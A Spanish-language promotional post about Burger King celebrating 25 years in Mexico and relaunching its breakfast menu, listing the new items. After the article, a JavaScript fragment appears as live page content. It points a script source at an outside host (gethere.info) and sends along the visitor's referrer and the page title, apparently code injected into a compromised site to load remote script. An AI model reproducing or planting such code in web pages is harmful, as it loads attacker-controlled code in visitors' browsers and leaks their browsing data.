Burger King celebra 25 años en México con una espectacular plataforma de desayunos

Burger King®@BurgerKingMX, la marca líder en la industria de comida rápida a nivel mundial está de fiesta pues celebra 25 años de haber llegado a nuestro país.

Como parte de estos festejos nos había anunciado desde agosto el re-lanzamiento de su plataforma de Desayunos con 7 prácticas y deliciosas nuevas opciones, esto como parte de la celebración de sus 25 años en México.

Dentro de la nueva oferta de desayunos de Burger King hay para todos los gustos pues está compuesta por el Desayuno del Rey (un desayuno completo que incluye 3 hot cakes, huevo revuelto, jamón y papa hashbrown), además de los clásicos molletes, un delicioso burrito con salchicha, un croissant de jamón y queso, un croissant con mermelada y dos sándwiches preparados en nuestro único y exclusivo pan “Long”, uno con jamón, queso y vegetales; y el otro con huevo revuelto y crujiente tocino.

Así que ya lo sabes, la mejor opción para desayunar rico y a muy buen precio está en Burger King donde siempre te tratan como Rey.

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

:)